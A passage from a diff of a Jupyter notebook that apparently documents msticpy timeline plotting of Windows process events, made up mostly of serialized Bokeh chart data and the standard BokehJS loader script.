Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\MonitoringHost.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"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\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[203]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,70,71,72,73,74,75,83,84,86,87,88,95,133,134,135,179,180,181,182,183,184,185,186,187,188,189,219,220,228,229,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1713\"},\"selection_policy\":{\"id\":\"1714\"}},\"id\":\"1620\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1719\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1671\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{},\"id\":\"1713\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1644\",\"type\":\"SaveTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1674\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1712\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data_source\":{\"id\":\"1619\"},\"glyph\":{\"id\":\"1674\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1675\"},\"view\":{\"id\":\"1677\"}},\"id\":\"1676\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1711\",\"type\":\"Selection\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1621\"},{\"id\":\"1641\"},{\"id\":\"1642\"},{\"id\":\"1643\"},{\"id\":\"1644\"},{\"id\":\"1645\"}]},\"id\":\"1647\",\"type\":\"Toolbar\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1679\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1718\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1675\",\"type\":\"Circle\"},{\"attributes\":{\"source\":{\"id\":\"1619\"}},\"id\":\"1677\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"1620\"},\"glyph\":{\"id\":\"1679\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1680\"},\"view\":{\"id\":\"1682\"}},\"id\":\"1681\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1659\",\"type\":\"DataRange1d\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1721\",\"type\":\"DaysTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1641\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"1619\"}},\"id\":\"1694\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1680\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1643\",\"type\":\"ResetTool\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"1684\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"1620\"}},\"id\":\"1682\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1688\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1720\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1619\"},\"glyph\":{\"id\":\"1691\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1692\"},\"view\":{\"id\":\"1694\"}},\"id\":\"1693\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1716\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1692\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"1714\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"overlay\":{\"id\":\"1646\"}},\"id\":\"1642\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1691\",\"type\":\"Scatter\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1646\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"1663\",\"type\":\"LinearScale\"}],\"root_ids\":[\"1700\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"2dfcb07c-0e43-4298-812b-a88e5063a3b2\",\"root_ids\":[\"1700\"],\"roots\":{\"1700\":\"b43aeb46-036c-457f-a385-398814a9197c\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1700"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "display_timeline(\n",
+    "    processes_on_host,\n",
+    "    group_by=\"Account\",\n",
+    "    source_columns=[\"NewProcessName\", \"ParentProcessName\"],\n",
+    "    legend=\"none\",\n",
+    "    yaxis=True,\n",
+    "    ygrid=True,\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Plotting directly from a DataFrame\r\n",
+    "\r\n",
+    "We've implemented the timeline plotting functions\r\n",
+    "as pandas accessors so you can plot directly from the DataFrame\r\n",
+    "using `mp_timeline.plot()`.\r\n",
+    "\r\n",
+    "All of the parameters used in the standalone function are available\r\n",
+    "in the pandas accessor functions.\r\n",
+    "\r\n",
+    "> Note: you still need to import `msticpy.nbtools.timeline`\r\n",
+    "> to activate this."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 6,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:29.330698Z",
+     "start_time": "2020-01-30T20:46:29.163792Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1935\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1935\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1935\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    